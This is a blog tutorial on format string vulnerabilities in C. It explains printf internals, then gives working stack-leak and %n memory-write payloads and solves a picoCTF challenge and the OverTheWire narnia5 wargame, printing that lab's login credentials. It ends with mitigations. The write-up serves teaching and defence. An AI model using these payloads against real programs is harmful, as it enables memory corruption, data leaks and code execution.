Format String Exploitation

Introduction

Welcome back to another blog post on exploiting memory vulnerabilities. In the previous article, we covered simple techniques, such as ROP, for bypassing buffer overflow protections. In this article, we look at format string vulnerabilities: how they arise, how we can exploit them, and which mitigations protect against them.

While these vulnerabilities were spotted as early as the 1990s and 2000s, memory corruption bugs still arise today, although they have become more complex to exploit. Understanding how memory corruption techniques work at a basic level is fundamental to learning exploit development and discovering more complex software flaws.

Prerequisites

To get the most out of this blog post, it is important to have some understanding of the following:

  • Basic C/C++ understanding
  • Linux fundamentals

Objectives

By the end of this blog post, readers should be able to:

  • Identify format string bugs
  • Exploit format string bugs
  • Protect against these vulnerabilities

Format strings and how they work

Format strings are used during input and output. A format string tells functions such as scanf() (input) and printf() (output) what type of data each argument holds and how to read or display it.

Formatting takes place via placeholders within the format string. For example, to print a person’s age, one could use the string “your age is %d”, where the conversion specifier %d denotes a signed decimal integer.
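As a minimal sketch of the age example, the snippet below formats the message into a buffer with snprintf(), which uses the same placeholders as printf(). The helper name format_age is ours, chosen only for illustration.

```c
#include <stdio.h>

/* Hypothetical helper: writes "your age is <age>" into out.
 * Returns the number of characters snprintf() reports (excluding the NUL). */
int format_age(char *out, size_t out_size, int age)
{
    /* %d is replaced by the decimal representation of the int argument. */
    return snprintf(out, out_size, "your age is %d", age);
}
```

Calling format_age(buf, sizeof buf, 30) with a large enough buffer leaves the text "your age is 30" in buf.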

Here we have a list of format specifiers and their uses in C.

Format Specifier    Type
%c                  Character
%d                  Signed integer
%e or %E            Scientific notation of floats
%f                  Float values
%g or %G            %e/%E or %f style, chosen by the value's exponent
%hi                 Signed integer (short)
%hu                 Unsigned integer (short)
%i                  Signed integer
%ld or %li          Long
%lf                 Double
%Lf                 Long double
%lu                 Unsigned long
%lli or %lld        Long long
%llu                Unsigned long long
%o                  Octal representation
%p                  Pointer
%s                  String
%u                  Unsigned int
%x or %X            Hexadecimal representation
%n                  Prints nothing; stores the number of characters written so far
%%                  Prints % character

We can also combine format strings with escape sequences to further improve output:

  • \n :newline
  • \t :tab
  • \b :backspace
  • \r :carriage return

printf()

printf() is one of the most common functions that take a format string. It stands for “print formatted” and it is complementary to scanf(). Many languages other than C copy the printf() format string syntax in their own I/O functions.

In the C programming language, the printf() function is used to print characters, strings, floats, and integers.

scanf()

This function is used to read formatted input from the user. We use format specifiers here just as we do in printf(), e.g., %d is used to take int input from the user.

When the user enters an integer it is stored in the testInteger variable.
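A minimal sketch of this idea is shown below. To keep it independent of terminal input, it uses sscanf(), which reads from a string but accepts the same format specifiers as scanf(). The function name parse_integer is an assumption made for this example; only testInteger comes from the text above.

```c
#include <stdio.h>

/* Hypothetical helper: parses a decimal integer from text into *testInteger.
 * Returns 1 on success and 0 if no integer could be read. */
int parse_integer(const char *text, int *testInteger)
{
    /* sscanf() returns the number of conversions that succeeded. */
    return sscanf(text, "%d", testInteger) == 1;
}
```

With scanf() the call would look like scanf("%d", &testInteger), reading from standard input instead of a string.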

Using both scanf and printf requires you to include the stdio.h header file.

Format String Exploitation

Now here comes the good part! Format string bugs come about when data submitted as input is used directly as the format string and is therefore interpreted by the application instead of being treated as plain text. In this way, an attacker could execute arbitrary code, read the stack contents, or crash the program by causing a segmentation fault.

To better understand the format string bug, let us take a look at some examples.

Here is a correct and safe way to use format strings:
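The sketch below is our own illustration of the safe pattern, not the original listing: the untrusted text is only ever passed as an argument to a fixed "%s" format. The helper name format_safely is hypothetical, and snprintf() is used so the result can be inspected.

```c
#include <stdio.h>

/* Hypothetical helper: copies untrusted text through a constant format string.
 * Any '%' characters inside user_text are treated as ordinary data. */
int format_safely(char *out, size_t out_size, const char *user_text)
{
    return snprintf(out, out_size, "%s", user_text);
}
```

In a command-line program, the equivalent call would be printf("%s\n", argv[1]).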

Compile the code above and run it

Here is an incorrect and vulnerable way to write format strings
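Again as a sketch under our own naming (format_unsafely is hypothetical), the vulnerable pattern passes the untrusted text as the format string itself. Compilers typically flag this with a format-security warning.

```c
#include <stdio.h>

/* VULNERABLE ON PURPOSE: user_text is used as the format string.
 * Any conversion specifier inside it (such as %x or %n) will be acted upon. */
int format_unsafely(char *out, size_t out_size, const char *user_text)
{
    return snprintf(out, out_size, user_text);
}
```

With harmless input such as "hello" both versions behave the same, which is why the bug is easy to miss. The difference only shows once the input contains a % character.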

Well, the programs work as expected, but what happens if we supply a format string as an argument to the program instead of a string?

For the first example:

The input is treated as plain data and is printed literally

For the second example:

We end up with some weird output because our input is passed directly to printf() as the format string, so %x is interpreted as a conversion specifier. Since no matching argument was supplied, printf() reads whatever values happen to be on the stack and shows them to us.

Stack anatomy during calling printf()

A previous blog post talked about how the stack behaves during function calls and how it stores temporary data like variables.

Here we will look at how the stack behaves when a printf() function is called. When called, printf() prepares an output buffer. It then loops through the format string character by character, copying each ordinary character to the buffer and advancing both the buffer pointer and the format string pointer by one.

If the next character is a %, we have a format specifier. Depending on the characters after the %, the stdarg.h macros are used to read the next value from the stack. How this value is interpreted (int, char, pointer, long, etc.) depends on the % and the characters following it.

After all that is finished, it sends the resulting buffer to the terminal for output (stdout).

Points to note

  • The function printf() fetches its arguments from the stack. If the format string needs three arguments, it will fetch 3 data items from the stack. Unless the stack is marked with a boundary, printf() does not know when it has run out of the arguments provided.
  • Since there is no such marking, printf() will continue fetching data from the stack.
  • In a mismatch case, it will fetch some data that does not belong to this function call.

Example of a printf() stack frame

Suppose we have a printf() call such as the one below, whose format string expects 3 arguments but which is given only 2

printf ("a has value %d, b has value %d, c is at address: %08x\n",
a, b);

The variables and the return pointer get loaded into the stack as follows

Note that the stack grows downwards towards lower addresses and that the arguments are pushed in reverse into the stack, representing a LIFO structure.

The call above passes only two arguments instead of 3; why does the compiler not always catch this?

  • Since printf() is a function defined with a variable number of arguments, the call looks valid as far as the language rules are concerned.
  • To find any mistakes, the compiler needs to understand how printf() works. Older compilers did not; modern GCC and Clang can warn about mismatches (-Wformat), but only when the format string is a literal they can inspect.
  • Sometimes the format string is generated at run time, and the compiler cannot detect any mismatches.

Crashing the program

If we supply “%s%s%s%s%s%s%s%s%s%s%s%s” as our input, then for each %s printf() will fetch a number from the stack, treat this number as an address and print out the memory contents pointed to by this address as a string until a NULL character is encountered.

Since the number fetched by printf() might not be an address, the memory pointed by this number might not exist (i.e. no physical memory has been assigned to such an address), and the program will crash.

Viewing the stack contents

We can try accessing elements at given positions on the stack using format specifiers like %x or %s, or with direct parameter access. For example, the 4th element on the stack can be accessed using the dollar sign qualifier as follows

%<int>$x – where int is the element’s position in the stack that you want to access.

./incorrect-frmt 'AAAA.%4$x'

Above, I tried accessing up to the 8th element, and not surprisingly, we run into ‘41414141’, the hex value for AAAA, which was the start of the first argument to the program. This means AAAA was loaded onto the stack together with %8$x, and when printf() encountered %8$x it printed the 8th element on the stack, which is our input.

Let us try viewing the stack with %08x, which retrieves parameters from the stack and displays them as 8-digit zero-padded hexadecimal numbers.

Again, we can see our AAAA at the 8th position of the stack.
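The dollar sign qualifier used above is a POSIX extension that also works in well-formed calls, where it simply selects which supplied argument to print. The sketch below shows that legitimate use; the helper name format_swapped is ours.

```c
#include <stdio.h>

/* Hypothetical helper: prints the second argument before the first. */
int format_swapped(char *out, size_t out_size,
                   const char *first, const char *second)
{
    /* %2$s selects the second variadic argument, %1$s the first. */
    return snprintf(out, out_size, "%2$s %1$s", first, second);
}
```

In the exploit, the same mechanism is abused: no real arguments exist, so %8$x selects whatever sits in the 8th argument slot on the stack.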

Difference between %x and %s

In C programs, local variables (and, on 32-bit x86, function arguments) are stored on the stack, so when printf() encounters %x, it simply reads the next argument slot on the stack and prints that value in hexadecimal.

When %s is encountered in a program, printf() will fetch a number from the stack and treat it as an address. It will then print out the memory contents pointed to by this address as a string until it encounters a NULL character.

Viewing memory at any location

Let’s take things a notch higher. To view data at any memory location in the program, we have to supply an address of the memory location.

printf() maintains an internal pointer that tracks the location of the next parameter on the stack. An important thing to note is that the format string itself is usually located on the stack.

If we can encode the target address we want to read from into the format string, the target address will be placed into the stack. We can control the address if we force printf() to obtain it from the format string.

Example of reading a target address from memory

Take an example of this vulnerable code

The code creates a 100-byte buffer (user_input), takes in input from the user, stores it in the buffer, and prints it. The vulnerability is on line 5: user_input is passed to printf() as the format string itself, with no separate format string specified.

Suppose we want to print the contents of address 0x10014808 using the format string vulnerability. We can supply the following as our input to the program.

"\x10\x01\x48\x08 %x %x %x %x %s" – each \x escape encodes one byte of the address

  • \x10\x01\x48\x08 are the 4 bytes of the target address (0x10014808), written here most significant byte first. On a little-endian machine such as x86, the bytes must be supplied in reverse order (\x08\x48\x01\x10).
  • Each %x moves printf()’s argument pointer one step closer to the format string.

We use 4 %x to move the printf()’s pointer towards the address stored in the format string. Once we reach our destination, we give %s to printf(), causing it to print out the contents of the memory address at 0x10014808

The space between user_input and the address passed to the printf() function does not belong to printf(). This distance decides how many %x you need to insert into the format string before giving %s. In our example, we needed 4 of them.
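To make the layout of such an input concrete, here is a sketch of a payload builder. It assumes a 32-bit little-endian target such as x86, where the address bytes appear least significant byte first; the helper name build_read_payload and its parameters are hypothetical.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Hypothetical helper: writes the 4 address bytes (little-endian), then
 * `pops` copies of " %x", then " %s", followed by a terminating NUL.
 * Returns the payload length, or 0 if the arguments are unusable. */
size_t build_read_payload(uint32_t addr, int pops,
                          unsigned char *out, size_t out_size)
{
    if (pops < 0)
        return 0;
    size_t need = 4 + (size_t)pops * 3 + 3;
    if (out_size < need + 1)
        return 0;

    for (int i = 0; i < 4; i++)
        out[i] = (unsigned char)(addr >> (8 * i)); /* least significant first */

    size_t pos = 4;
    for (int i = 0; i < pops; i++) {
        memcpy(out + pos, " %x", 3);               /* each %x skips one slot */
        pos += 3;
    }
    memcpy(out + pos, " %s", 4);                   /* copies the NUL as well */
    return pos + 3;
}
```

The number of %x entries is the part that has to be found by experiment for each target, since it depends on the distance described above. An address containing a zero byte would cut the string short, so this sketch only suits addresses without one.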

Example of writing to any location in memory

The %n format specifier does not print anything. Instead, it takes the next argument as a pointer to an int and writes there the number of bytes printf() has output so far.

Take a look at the examples below

The above will write 0 to the variable a, because nothing is being output.

This example will write 4 to variable a, since “AAAA” is of length 4.
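The two cases just described can be reproduced with the sketch below. It uses snprintf() into a scratch buffer so nothing is printed, and the function names are ours. The format strings are literals on purpose, because some hardened C libraries refuse %n in a format string that lives in writable memory.

```c
#include <stdio.h>

/* Nothing is output before %n, so 0 is stored in a. */
int count_with_empty_prefix(void)
{
    char out[16];
    int a = -1;
    snprintf(out, sizeof out, "%n", &a);
    return a;
}

/* "AAAA" (4 bytes) is output before %n, so 4 is stored in a. */
int count_after_four_bytes(void)
{
    char out[16];
    int a = -1;
    snprintf(out, sizeof out, "AAAA%n", &a);
    return a;
}
```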

Instead of a simple %n, we can use %<num>$n to choose which argument (by position) supplies the address to write to.

Enough of the theory, let’s get our hands dirty.

Practical Example 1: Reading from the stack

In our first example, we are going to solve a simple CTF challenge by picoCTF. This will require us to leak an API key from the server via a format string bug.

We have a vuln.c file, the source code to the challenge. Let us interact with the challenge remotely, then analyze the source code locally.

The program has two options. The first one asks for an API token. The second doesn’t have anything interesting.

We review the source code

We compile the source code and run it locally to understand the logic of the application

The program prints “Flag file not found. Contact an admin.” Tracing this line back to the source code, we get this

The buy_stonks function is the function that gets called when the first option is selected. FILE *f = fopen("api","r"); opens a file named api which contains the flag. Let us create a dummy api file on our local machine and run the binary again.

If you look closely, the printf() call in the buy_stonks function contains the format string vulnerability.


We exploit the format string bug by supplying a number of %x as our input. These %x specifiers get stored on the stack, and when printf() encounters them, it will leak the data on the stack. This way, we can reveal the contents of the api file.

We leak some data off the stack, but since %x returns data in hex, we convert it back to ASCII using CyberChef

Our output may look like gibberish, but if you observe closely, you can see some printable text that is reversed in groups of four characters. This is due to the architecture of the machine we grabbed the data from. On a little-endian machine, the bytes of each 4-byte word are stored least significant byte first, so printing the word as a number reverses their order. Our target flag is ocip{FTC0l_I4_t5m_ll0m_y_y3nc42a6a41ÿÞ.} We need to reverse the byte order of each 4-byte group and discard the trailing unreadable bytes.

Our flag is picoCTF{I_l05t_4ll_my_m0n3y_a24c14a6}
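The byte-order fix can also be done in a few lines of C instead of by hand. The sketch below is our own helper (decode_leaked_words is a hypothetical name) and assumes the leak consists of whitespace-separated 32-bit words as printed by %x.

```c
#include <stdio.h>
#include <stdlib.h>

/* Hypothetical helper: turns hex words such as "6f636970 7b465443" back into
 * the bytes as they sat in memory (least significant byte of each word first).
 * Returns the number of bytes written, excluding the terminating NUL. */
size_t decode_leaked_words(const char *hex_words, char *out, size_t out_size)
{
    size_t n = 0;
    const char *p = hex_words;
    char *end;

    for (;;) {
        unsigned long word = strtoul(p, &end, 16);
        if (end == p)
            break;                      /* no more hex digits to read */
        if (n + 4 >= out_size)
            break;                      /* keep room for the NUL */
        for (int i = 0; i < 4; i++)
            out[n++] = (char)((word >> (8 * i)) & 0xff);
        p = end;
    }
    if (out_size > 0)
        out[n] = '\0';
    return n;
}
```

Fed the first two leaked words of the flag, 6f636970 and 7b465443, it produces picoCTF{.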

Practical Example 2: Writing to the stack

For this example, we will be exploiting narnia5 from the Narnia series by OverTheWire

credentials:

  • username: narnia5
  • password: faimahchiy
  • hostname: narnia.labs.overthewire.org
  • port: 2226

Our challenge is in the /narnia directory.

We get presented with both the source code and compiled binary file. Our goal for the challenge is to change the value of the i variable from 1 to 500 using a format string vulnerability.

If i is set to 500, we get a message “GOOD” and a shell. The snprintf function writes formatted output into a character buffer of limited size. Here, it takes the argument from the command line and stores it in a buffer, using that argument as the format string. There is an apparent format string vulnerability on lines 12 and 19.

The program prints some information concerning the variables in the program.

In this case, when we supply 2 %x, we see that the first value popped off the stack is actually AAAA, the contents we put into our buffer. Since the first value read by %x is the contents of our buffer, all we need to do now is place a memory address there and use %n to write to it.

Since our first value is directly at the top of the stack, let us replace the As with a memory address location, such as the one provided by i.

./narnia5 $(echo -e "\xe0\xd6\xff\xff")%n

Interesting, the value of i changes to 4. If you recall, we mentioned that %n writes the number of bytes output so far to the address supplied as its argument.


So in this case, %n writes 4 to i because 4 bytes (the address itself) have been output before %n is reached. To overwrite i with 500, we therefore need to output an additional 496 bytes.

We can use a field width with %x to generate the padding: %496x pads its output to 496 characters, and %1\$n then writes the running total to the address held in the first argument, as follows

./narnia5 $(echo -e "\xd0\xd6\xff\xff")%496x%1\$n
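The arithmetic behind this input (4 address bytes plus 496 characters of padding) can be checked safely on its own. In the sketch below, which is not the narnia5 program, "AAAA" stands in for the 4 address bytes and %n writes into an ordinary local variable; the function name is ours.

```c
#include <stdio.h>

/* Outputs 4 placeholder bytes and one value padded to 496 characters,
 * then returns the byte count that %n records at that point. */
int count_after_padding(void)
{
    char out[512];
    int count = -1;

    /* %496x pads the hexadecimal value 1 with spaces to a width of 496. */
    snprintf(out, sizeof out, "AAAA%496x%n", 1u, &count);
    return count;   /* 4 + 496 */
}
```

The function returns 500, the value the challenge requires in i.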

Mitigations against format string vulnerabilities

1. Secure coding

The best way to prevent format string bugs is to write secure code, since the root cause of these bugs is insecure coding. Developers working in languages that are susceptible to format string vulnerabilities should be aware of risky functions and their secure usage, above all never passing user-controlled data as the format string.

2. FormatGuard

FormatGuard is a mechanism that defends against format bug attacks by comparing the number of actual arguments presented to printf against the number of arguments called by the format string. If the actual number of arguments is less than the number of arguments the format string calls for, then FormatGuard deems this call to be an attack.
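The comparison described above can be illustrated with a simplified sketch. This is not FormatGuard's actual implementation: the function names are hypothetical, and the parser ignores '*' widths and positional %N$ forms.

```c
#include <stddef.h>
#include <string.h>

/* Counts the conversions in fmt that consume an argument.
 * "%%" consumes none. Simplified: no '*' or "%N$" handling. */
size_t count_format_args(const char *fmt)
{
    size_t count = 0;

    for (const char *p = fmt; *p != '\0'; p++) {
        if (*p != '%')
            continue;
        p++;
        if (*p == '\0')
            break;                      /* lone trailing '%' */
        if (*p == '%')
            continue;                   /* literal percent sign */
        /* Skip flags, width, precision and length modifiers. */
        while (*p != '\0' && strchr("diouxXeEfFgGaAcspn", *p) == NULL)
            p++;
        if (*p == '\0')
            break;
        count++;
    }
    return count;
}

/* Returns 1 if the call supplies at least as many arguments as fmt needs. */
int call_looks_safe(const char *fmt, size_t supplied)
{
    return supplied >= count_format_args(fmt);
}
```

For the earlier example with three conversions and only two arguments, call_looks_safe() returns 0, which is the situation a FormatGuard-style check would treat as an attack.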

Conclusion

What we have gone through in this article creates an excellent foundation for understanding basic binary exploitation and may get you into low-level software security. I had lots of fun writing this article as I had no experience with format string bugs, and I hope you enjoyed it too!
